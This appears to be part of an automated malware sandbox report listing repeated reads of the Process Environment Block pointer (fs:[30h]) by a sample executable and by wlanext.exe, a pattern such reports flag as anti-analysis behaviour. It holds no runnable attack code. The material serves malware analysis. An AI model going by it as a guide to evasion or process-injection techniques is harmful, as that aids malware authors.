Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA927A mov eax, dword ptr fs:[00000030h]	3_2_00AA927A
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B1B260 mov eax, dword ptr fs:[00000030h]	3_2_00B1B260
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B1B260 mov eax, dword ptr fs:[00000030h]	3_2_00B1B260
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B38A62 mov eax, dword ptr fs:[00000030h]	3_2_00B38A62
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A69240 mov eax, dword ptr fs:[00000030h]	3_2_00A69240
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A69240 mov eax, dword ptr fs:[00000030h]	3_2_00A69240
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A69240 mov eax, dword ptr fs:[00000030h]	3_2_00A69240
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A69240 mov eax, dword ptr fs:[00000030h]	3_2_00A69240
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AF4257 mov eax, dword ptr fs:[00000030h]	3_2_00AF4257
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A94BAD mov eax, dword ptr fs:[00000030h]	3_2_00A94BAD
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A94BAD mov eax, dword ptr fs:[00000030h]	3_2_00A94BAD
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A94BAD mov eax, dword ptr fs:[00000030h]	3_2_00A94BAD
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B35BA5 mov eax, dword ptr fs:[00000030h]	3_2_00B35BA5
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A71B8F mov eax, dword ptr fs:[00000030h]	3_2_00A71B8F
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A71B8F mov eax, dword ptr fs:[00000030h]	3_2_00A71B8F
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B1D380 mov ecx, dword ptr fs:[00000030h]	3_2_00B1D380
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B2138A mov eax, dword ptr fs:[00000030h]	3_2_00B2138A
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A9B390 mov eax, dword ptr fs:[00000030h]	3_2_00A9B390
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A92397 mov eax, dword ptr fs:[00000030h]	3_2_00A92397
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A8DBE9 mov eax, dword ptr fs:[00000030h]	3_2_00A8DBE9
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A903E2 mov eax, dword ptr fs:[00000030h]	3_2_00A903E2
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A903E2 mov eax, dword ptr fs:[00000030h]	3_2_00A903E2
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A903E2 mov eax, dword ptr fs:[00000030h]	3_2_00A903E2
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A903E2 mov eax, dword ptr fs:[00000030h]	3_2_00A903E2
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A903E2 mov eax, dword ptr fs:[00000030h]	3_2_00A903E2
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A903E2 mov eax, dword ptr fs:[00000030h]	3_2_00A903E2
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE53CA mov eax, dword ptr fs:[00000030h]	3_2_00AE53CA
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE53CA mov eax, dword ptr fs:[00000030h]	3_2_00AE53CA
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B2131B mov eax, dword ptr fs:[00000030h]	3_2_00B2131B
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A6DB60 mov ecx, dword ptr fs:[00000030h]	3_2_00A6DB60
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A93B7A mov eax, dword ptr fs:[00000030h]	3_2_00A93B7A
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A93B7A mov eax, dword ptr fs:[00000030h]	3_2_00A93B7A
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A6DB40 mov eax, dword ptr fs:[00000030h]	3_2_00A6DB40
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B38B58 mov eax, dword ptr fs:[00000030h]	3_2_00B38B58
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A6F358 mov eax, dword ptr fs:[00000030h]	3_2_00A6F358
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A7849B mov eax, dword ptr fs:[00000030h]	3_2_00A7849B
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B214FB mov eax, dword ptr fs:[00000030h]	3_2_00B214FB
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]	3_2_00AE6CF0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]	3_2_00AE6CF0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]	3_2_00AE6CF0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B38CD6 mov eax, dword ptr fs:[00000030h]	3_2_00B38CD6
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A9BC2C mov eax, dword ptr fs:[00000030h]	3_2_00A9BC2C
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE6C0A mov eax, dword ptr fs:[00000030h]	3_2_00AE6C0A
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE6C0A mov eax, dword ptr fs:[00000030h]	3_2_00AE6C0A
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE6C0A mov eax, dword ptr fs:[00000030h]	3_2_00AE6C0A
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE6C0A mov eax, dword ptr fs:[00000030h]	3_2_00AE6C0A
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]	3_2_00B21C06
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]	3_2_00B21C06
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]	3_2_00B21C06
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]	3_2_00B21C06
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]	3_2_00B21C06
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]	3_2_00B21C06
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]	3_2_00B21C06
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]	3_2_00B21C06
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]	3_2_00B21C06
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]	3_2_00B21C06
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]	3_2_00B21C06
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]	3_2_00B21C06
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]	3_2_00B21C06
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B21C06 mov eax, dword ptr fs:[00000030h]	3_2_00B21C06
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B3740D mov eax, dword ptr fs:[00000030h]	3_2_00B3740D
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B3740D mov eax, dword ptr fs:[00000030h]	3_2_00B3740D
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B3740D mov eax, dword ptr fs:[00000030h]	3_2_00B3740D
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A8746D mov eax, dword ptr fs:[00000030h]	3_2_00A8746D
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A9A44B mov eax, dword ptr fs:[00000030h]	3_2_00A9A44B
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AFC450 mov eax, dword ptr fs:[00000030h]	3_2_00AFC450
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AFC450 mov eax, dword ptr fs:[00000030h]	3_2_00AFC450
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A935A1 mov eax, dword ptr fs:[00000030h]	3_2_00A935A1
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A91DB5 mov eax, dword ptr fs:[00000030h]	3_2_00A91DB5
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A91DB5 mov eax, dword ptr fs:[00000030h]	3_2_00A91DB5
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A91DB5 mov eax, dword ptr fs:[00000030h]	3_2_00A91DB5
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B305AC mov eax, dword ptr fs:[00000030h]	3_2_00B305AC
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B305AC mov eax, dword ptr fs:[00000030h]	3_2_00B305AC
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A92581 mov eax, dword ptr fs:[00000030h]	3_2_00A92581
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A92581 mov eax, dword ptr fs:[00000030h]	3_2_00A92581
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A92581 mov eax, dword ptr fs:[00000030h]	3_2_00A92581
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A92581 mov eax, dword ptr fs:[00000030h]	3_2_00A92581
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A62D8A mov eax, dword ptr fs:[00000030h]	3_2_00A62D8A
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A62D8A mov eax, dword ptr fs:[00000030h]	3_2_00A62D8A
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A62D8A mov eax, dword ptr fs:[00000030h]	3_2_00A62D8A
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A62D8A mov eax, dword ptr fs:[00000030h]	3_2_00A62D8A
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A62D8A mov eax, dword ptr fs:[00000030h]	3_2_00A62D8A
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A9FD9B mov eax, dword ptr fs:[00000030h]	3_2_00A9FD9B
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A9FD9B mov eax, dword ptr fs:[00000030h]	3_2_00A9FD9B
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B18DF1 mov eax, dword ptr fs:[00000030h]	3_2_00B18DF1
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A7D5E0 mov eax, dword ptr fs:[00000030h]	3_2_00A7D5E0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A7D5E0 mov eax, dword ptr fs:[00000030h]	3_2_00A7D5E0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]	3_2_00AE6DC9
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]	3_2_00AE6DC9
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]	3_2_00AE6DC9
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE6DC9 mov ecx, dword ptr fs:[00000030h]	3_2_00AE6DC9
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]	3_2_00AE6DC9
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]	3_2_00AE6DC9
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B38D34 mov eax, dword ptr fs:[00000030h]	3_2_00B38D34
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A94D3B mov eax, dword ptr fs:[00000030h]	3_2_00A94D3B
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A94D3B mov eax, dword ptr fs:[00000030h]	3_2_00A94D3B
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A94D3B mov eax, dword ptr fs:[00000030h]	3_2_00A94D3B
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]	3_2_00A73D34
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]	3_2_00A73D34
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]	3_2_00A73D34
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]	3_2_00A73D34
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]	3_2_00A73D34
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]	3_2_00A73D34
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]	3_2_00A73D34
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]	3_2_00A73D34
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]	3_2_00A73D34
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]	3_2_00A73D34
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]	3_2_00A73D34
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]	3_2_00A73D34
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A73D34 mov eax, dword ptr fs:[00000030h]	3_2_00A73D34
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A6AD30 mov eax, dword ptr fs:[00000030h]	3_2_00A6AD30
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AEA537 mov eax, dword ptr fs:[00000030h]	3_2_00AEA537
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A8C577 mov eax, dword ptr fs:[00000030h]	3_2_00A8C577
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A8C577 mov eax, dword ptr fs:[00000030h]	3_2_00A8C577
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA3D43 mov eax, dword ptr fs:[00000030h]	3_2_00AA3D43
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE3540 mov eax, dword ptr fs:[00000030h]	3_2_00AE3540
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A87D50 mov eax, dword ptr fs:[00000030h]	3_2_00A87D50
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE46A7 mov eax, dword ptr fs:[00000030h]	3_2_00AE46A7
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B30EA5 mov eax, dword ptr fs:[00000030h]	3_2_00B30EA5
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B30EA5 mov eax, dword ptr fs:[00000030h]	3_2_00B30EA5
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B30EA5 mov eax, dword ptr fs:[00000030h]	3_2_00B30EA5
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AFFE87 mov eax, dword ptr fs:[00000030h]	3_2_00AFFE87
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A776E2 mov eax, dword ptr fs:[00000030h]	3_2_00A776E2
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A916E0 mov ecx, dword ptr fs:[00000030h]	3_2_00A916E0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B38ED6 mov eax, dword ptr fs:[00000030h]	3_2_00B38ED6
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A936CC mov eax, dword ptr fs:[00000030h]	3_2_00A936CC
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA8EC7 mov eax, dword ptr fs:[00000030h]	3_2_00AA8EC7
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B1FEC0 mov eax, dword ptr fs:[00000030h]	3_2_00B1FEC0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A6E620 mov eax, dword ptr fs:[00000030h]	3_2_00A6E620
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B1FE3F mov eax, dword ptr fs:[00000030h]	3_2_00B1FE3F
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A6C600 mov eax, dword ptr fs:[00000030h]	3_2_00A6C600
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A6C600 mov eax, dword ptr fs:[00000030h]	3_2_00A6C600
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A6C600 mov eax, dword ptr fs:[00000030h]	3_2_00A6C600
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A98E00 mov eax, dword ptr fs:[00000030h]	3_2_00A98E00
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A9A61C mov eax, dword ptr fs:[00000030h]	3_2_00A9A61C
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A9A61C mov eax, dword ptr fs:[00000030h]	3_2_00A9A61C
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B21608 mov eax, dword ptr fs:[00000030h]	3_2_00B21608
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A7766D mov eax, dword ptr fs:[00000030h]	3_2_00A7766D
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A8AE73 mov eax, dword ptr fs:[00000030h]	3_2_00A8AE73
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A8AE73 mov eax, dword ptr fs:[00000030h]	3_2_00A8AE73
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A8AE73 mov eax, dword ptr fs:[00000030h]	3_2_00A8AE73
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A8AE73 mov eax, dword ptr fs:[00000030h]	3_2_00A8AE73
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A8AE73 mov eax, dword ptr fs:[00000030h]	3_2_00A8AE73
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A77E41 mov eax, dword ptr fs:[00000030h]	3_2_00A77E41
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A77E41 mov eax, dword ptr fs:[00000030h]	3_2_00A77E41
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A77E41 mov eax, dword ptr fs:[00000030h]	3_2_00A77E41
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A77E41 mov eax, dword ptr fs:[00000030h]	3_2_00A77E41
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A77E41 mov eax, dword ptr fs:[00000030h]	3_2_00A77E41
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A77E41 mov eax, dword ptr fs:[00000030h]	3_2_00A77E41
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A78794 mov eax, dword ptr fs:[00000030h]	3_2_00A78794
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE7794 mov eax, dword ptr fs:[00000030h]	3_2_00AE7794
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE7794 mov eax, dword ptr fs:[00000030h]	3_2_00AE7794
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AE7794 mov eax, dword ptr fs:[00000030h]	3_2_00AE7794
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AA37F5 mov eax, dword ptr fs:[00000030h]	3_2_00AA37F5
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A64F2E mov eax, dword ptr fs:[00000030h]	3_2_00A64F2E
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A64F2E mov eax, dword ptr fs:[00000030h]	3_2_00A64F2E
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A9E730 mov eax, dword ptr fs:[00000030h]	3_2_00A9E730
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A9A70E mov eax, dword ptr fs:[00000030h]	3_2_00A9A70E
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A9A70E mov eax, dword ptr fs:[00000030h]	3_2_00A9A70E
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B3070D mov eax, dword ptr fs:[00000030h]	3_2_00B3070D
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B3070D mov eax, dword ptr fs:[00000030h]	3_2_00B3070D
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A8F716 mov eax, dword ptr fs:[00000030h]	3_2_00A8F716
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AFFF10 mov eax, dword ptr fs:[00000030h]	3_2_00AFFF10
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00AFFF10 mov eax, dword ptr fs:[00000030h]	3_2_00AFFF10
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A7FF60 mov eax, dword ptr fs:[00000030h]	3_2_00A7FF60
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00B38F6A mov eax, dword ptr fs:[00000030h]	3_2_00B38F6A
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00A7EF40 mov eax, dword ptr fs:[00000030h]	3_2_00A7EF40
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0314131B mov eax, dword ptr fs:[00000030h]	9_2_0314131B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0308DB40 mov eax, dword ptr fs:[00000030h]	9_2_0308DB40
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03158B58 mov eax, dword ptr fs:[00000030h]	9_2_03158B58
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0308F358 mov eax, dword ptr fs:[00000030h]	9_2_0308F358
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0308DB60 mov ecx, dword ptr fs:[00000030h]	9_2_0308DB60
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B3B7A mov eax, dword ptr fs:[00000030h]	9_2_030B3B7A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B3B7A mov eax, dword ptr fs:[00000030h]	9_2_030B3B7A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03091B8F mov eax, dword ptr fs:[00000030h]	9_2_03091B8F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03091B8F mov eax, dword ptr fs:[00000030h]	9_2_03091B8F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0313D380 mov ecx, dword ptr fs:[00000030h]	9_2_0313D380
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030BB390 mov eax, dword ptr fs:[00000030h]	9_2_030BB390
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B2397 mov eax, dword ptr fs:[00000030h]	9_2_030B2397
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0314138A mov eax, dword ptr fs:[00000030h]	9_2_0314138A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B4BAD mov eax, dword ptr fs:[00000030h]	9_2_030B4BAD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B4BAD mov eax, dword ptr fs:[00000030h]	9_2_030B4BAD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B4BAD mov eax, dword ptr fs:[00000030h]	9_2_030B4BAD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03155BA5 mov eax, dword ptr fs:[00000030h]	9_2_03155BA5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_031053CA mov eax, dword ptr fs:[00000030h]	9_2_031053CA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_031053CA mov eax, dword ptr fs:[00000030h]	9_2_031053CA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030ADBE9 mov eax, dword ptr fs:[00000030h]	9_2_030ADBE9
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B03E2 mov eax, dword ptr fs:[00000030h]	9_2_030B03E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B03E2 mov eax, dword ptr fs:[00000030h]	9_2_030B03E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B03E2 mov eax, dword ptr fs:[00000030h]	9_2_030B03E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B03E2 mov eax, dword ptr fs:[00000030h]	9_2_030B03E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B03E2 mov eax, dword ptr fs:[00000030h]	9_2_030B03E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030B03E2 mov eax, dword ptr fs:[00000030h]	9_2_030B03E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0314AA16 mov eax, dword ptr fs:[00000030h]	9_2_0314AA16
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0314AA16 mov eax, dword ptr fs:[00000030h]	9_2_0314AA16
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03098A0A mov eax, dword ptr fs:[00000030h]	9_2_03098A0A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030A3A1C mov eax, dword ptr fs:[00000030h]	9_2_030A3A1C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03085210 mov eax, dword ptr fs:[00000030h]	9_2_03085210
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03085210 mov ecx, dword ptr fs:[00000030h]	9_2_03085210
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03085210 mov eax, dword ptr fs:[00000030h]	9_2_03085210
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03085210 mov eax, dword ptr fs:[00000030h]	9_2_03085210
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0308AA16 mov eax, dword ptr fs:[00000030h]	9_2_0308AA16
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0308AA16 mov eax, dword ptr fs:[00000030h]	9_2_0308AA16
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C4A2C mov eax, dword ptr fs:[00000030h]	9_2_030C4A2C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_030C4A2C mov eax, dword ptr fs:[00000030h]	9_2_030C4A2C
